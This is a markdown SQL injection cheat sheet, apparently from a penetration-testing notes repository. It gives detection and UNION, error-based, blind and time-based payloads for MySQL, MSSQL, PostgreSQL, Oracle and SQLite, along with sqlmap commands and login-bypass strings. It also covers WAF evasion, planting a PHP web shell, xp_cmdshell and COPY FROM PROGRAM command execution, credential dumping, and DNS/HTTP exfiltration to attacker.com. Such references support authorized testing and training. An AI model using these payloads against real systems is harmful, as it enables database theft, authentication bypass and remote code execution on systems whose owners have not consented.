Skip to content

7.1.SQL-Injection.md

Latest commit

 

History

History
733 lines (514 loc) · 12 KB

7.1.SQL-Injection.md

File metadata and controls

733 lines (514 loc) · 12 KB

SQL Injection

Table of Contents

Detection

Quick Check (One-liner)

sqlmap -u "http://$rhost/page.php?id=1" --batch --risk=3 --level=5 --dbs

Basic Tests

Single quote test

'
''
`
``

Comment tests

'--
'#
'/*
' OR 1=1--
' OR '1'='1
" OR 1=1--
" OR "1"="1

Arithmetic tests

1+1
1-1
1*1
1/1

Error-Based Detection

Force SQL errors to confirm injection

' AND 1=CONVERT(int, (SELECT @@version))--
' AND extractvalue(1, concat(0x7e, version()))--
' AND updatexml(1, concat(0x7e, version()), 1)--

Union-Based Injection

Column Enumeration

Find number of columns using ORDER BY

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
...
' ORDER BY N-- (until error)

Find number of columns using UNION SELECT

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

Find string columns

' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a'--

Data Extraction

Extract database version

' UNION SELECT @@version,NULL,NULL--          # MySQL/MSSQL
' UNION SELECT version(),NULL,NULL--          # PostgreSQL
' UNION SELECT banner,NULL,NULL FROM v$version-- # Oracle

Extract current database

' UNION SELECT database(),NULL,NULL--         # MySQL
' UNION SELECT current_database(),NULL,NULL-- # PostgreSQL
' UNION SELECT db_name(),NULL,NULL--          # MSSQL

Extract table names

' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()--

Extract column names

' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

Extract data

' UNION SELECT username,password,NULL FROM users--
' UNION SELECT CONCAT(username,':',password),NULL,NULL FROM users--

Error-Based Injection

MySQL

Extract data via error messages

' AND extractvalue(1, concat(0x7e, (SELECT database())))--
' AND updatexml(1, concat(0x7e, (SELECT database())), 1)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

MSSQL

Extract data via CONVERT error

' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CONVERT(int, (SELECT @@version))--

PostgreSQL

Extract data via CAST error

' AND 1=CAST((SELECT version()) AS int)--

Blind SQL Injection

Boolean-Based

Test for true/false conditions

' AND 1=1--  (true - normal response)
' AND 1=2--  (false - different response)

Extract data character by character

' AND SUBSTRING((SELECT database()),1,1)='a'--
' AND SUBSTRING((SELECT database()),1,1)='b'--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--

Binary search for efficiency

' AND ASCII(SUBSTRING((SELECT database()),1,1))>109--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>96--
' AND ASCII(SUBSTRING((SELECT database()),1,1))=100--

Time-Based

MySQL time delay

' AND SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--

PostgreSQL time delay

'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--

MSSQL time delay

'; WAITFOR DELAY '0:0:5'--
' IF (1=1) WAITFOR DELAY '0:0:5'--

Oracle time delay

' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--

Database Specific

MySQL Queries

System information

SELECT @@version;
SELECT user();
SELECT database();
SELECT @@datadir;

List all databases

SELECT schema_name FROM information_schema.schemata;

List tables

SELECT table_name FROM information_schema.tables WHERE table_schema=database();

List columns

SELECT column_name FROM information_schema.columns WHERE table_name='users';

Read files

SELECT LOAD_FILE('/etc/passwd');

Write files

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

PostgreSQL Queries

System information

SELECT version();
SELECT current_user;
SELECT current_database();

List databases

SELECT datname FROM pg_database;

List tables

SELECT tablename FROM pg_tables WHERE schemaname='public';

List columns

SELECT column_name FROM information_schema.columns WHERE table_name='users';

Read files

SELECT pg_read_file('/etc/passwd');

Command execution

COPY (SELECT '') TO PROGRAM 'id';
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

MSSQL Queries

System information

SELECT @@version;
SELECT user_name();
SELECT db_name();
SELECT @@servername;

List databases

SELECT name FROM master..sysdatabases;
SELECT name FROM sys.databases;

List tables

SELECT name FROM sysobjects WHERE xtype='U';
SELECT table_name FROM information_schema.tables;

List columns

SELECT column_name FROM information_schema.columns WHERE table_name='users';

xp_cmdshell (command execution)

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

Read files

SELECT * FROM OPENROWSET(BULK 'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS Contents;

Oracle

System information

SELECT * FROM v$version;
SELECT user FROM dual;
SELECT ora_database_name FROM dual;

List tables

SELECT table_name FROM all_tables;
SELECT table_name FROM user_tables;

List columns

SELECT column_name FROM all_tab_columns WHERE table_name='USERS';

SQLite

System information

SELECT sqlite_version();

List tables

SELECT name FROM sqlite_master WHERE type='table';

List columns

PRAGMA table_info(users);

Union-Based SQLite Injection

' UNION SELECT NULL,sqlite_version()--
' UNION SELECT NULL,sql from sqlite_schema--
' UNION SELECT NULL,tbl_name from sqlite_master WHERE type='table'--
' UNION SELECT NULL,sql from sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table' --
' UNION SELECT name, value FROM secrets--

SQLMap

Basic Usage

Test URL parameter

sqlmap -u "http://$rhost/page.php?id=1"

Automatic detection

sqlmap -u "http://$rhost/page.php?id=1" --batch

Specify database type

sqlmap -u "http://$rhost/page.php?id=1" --dbms=mysql

Increase verbosity

sqlmap -u "http://$rhost/page.php?id=1" -v 3

POST Requests

POST data injection

sqlmap -u "http://$rhost/login.php" --data="username=admin&password=pass"

Specify parameter to test

sqlmap -u "http://$rhost/login.php" --data="username=admin&password=pass" -p username

Cookies and Headers

With cookies

sqlmap -u "http://$rhost/page.php?id=1" --cookie="PHPSESSID=abc123"

With custom headers

sqlmap -u "http://$rhost/page.php?id=1" -H "X-Forwarded-For: 127.0.0.1"

From Burp request file

sqlmap -r request.txt

Database Enumeration

Get current database

sqlmap -u "http://$rhost/page.php?id=1" --current-db

List all databases

sqlmap -u "http://$rhost/page.php?id=1" --dbs

List tables in database

sqlmap -u "http://$rhost/page.php?id=1" -D database_name --tables

List columns in table

sqlmap -u "http://$rhost/page.php?id=1" -D database_name -T users --columns

Dump data

sqlmap -u "http://$rhost/page.php?id=1" -D database_name -T users --dump

Dump specific columns

sqlmap -u "http://$rhost/page.php?id=1" -D database_name -T users -C username,password --dump

Dump all

sqlmap -u "http://$rhost/page.php?id=1" --dump-all

File Operations

Read file

sqlmap -u "http://$rhost/page.php?id=1" --file-read="/etc/passwd"

Write file

sqlmap -u "http://$rhost/page.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

OS Shell

Get OS shell

sqlmap -u "http://$rhost/page.php?id=1" --os-shell

Get SQL shell

sqlmap -u "http://$rhost/page.php?id=1" --sql-shell

Execute OS command

sqlmap -u "http://$rhost/page.php?id=1" --os-cmd="whoami"

Tamper Scripts

List tamper scripts

sqlmap --list-tampers

Use tamper scripts (WAF bypass)

sqlmap -u "http://$rhost/page.php?id=1" --tamper=space2comment
sqlmap -u "http://$rhost/page.php?id=1" --tamper=between,randomcase
sqlmap -u "http://$rhost/page.php?id=1" --tamper=charencode

Common tamper combinations

# MySQL
sqlmap -u "http://$rhost/page.php?id=1" --tamper=space2comment,between,randomcase

# MSSQL
sqlmap -u "http://$rhost/page.php?id=1" --tamper=space2mssqlblank,between

# General WAF bypass
sqlmap -u "http://$rhost/page.php?id=1" --tamper=apostrophemask,apostrophenullencode,base64encode

Authentication Bypass

Common login bypass payloads

admin'--
admin'#
admin'/*
' OR 1=1--
' OR 1=1#
' OR '1'='1
' OR '1'='1'--
" OR 1=1--
" OR "1"="1
admin' OR '1'='1
admin" OR "1"="1
') OR ('1'='1
') OR '1'='1'--

MD5 hash comparison bypass

' UNION SELECT 1,'admin','81dc9bdb52d04dc20036dbd8313ed055'-- (password: 1234)

WAF Bypass

Space Bypass

/**/
+
%20
%09
%0a
%0b
%0c
%0d

Examples

UNION/**/SELECT/**/1,2,3
UNION+SELECT+1,2,3

Comment Bypass

/*!UNION*/ /*!SELECT*/ 1,2,3

Case Variation

UnIoN SeLeCt 1,2,3
uNiOn sElEcT 1,2,3

Encoding

# URL encoding
%55%4e%49%4f%4e%20%53%45%4c%45%43%54

# Double URL encoding
%2555%254e%2549%254f%254e

Null Byte

%00' UNION SELECT 1,2,3--

Second-Order SQLi

Inject payload that gets stored and executed later

# During registration (stored)
Username: admin'--

# During password reset (executed)
UPDATE users SET password='newpass' WHERE username='admin'--'

Out-of-Band (OOB)

DNS Exfiltration

MySQL

SELECT LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'));

MSSQL

EXEC master..xp_dirtree '\\attacker.com\a';
EXEC master..xp_subdirs '\\attacker.com\a';

Oracle

SELECT UTL_HTTP.REQUEST('http://attacker.com/'||user) FROM dual;
SELECT HTTPURITYPE('http://attacker.com/'||user).getclob() FROM dual;

See Also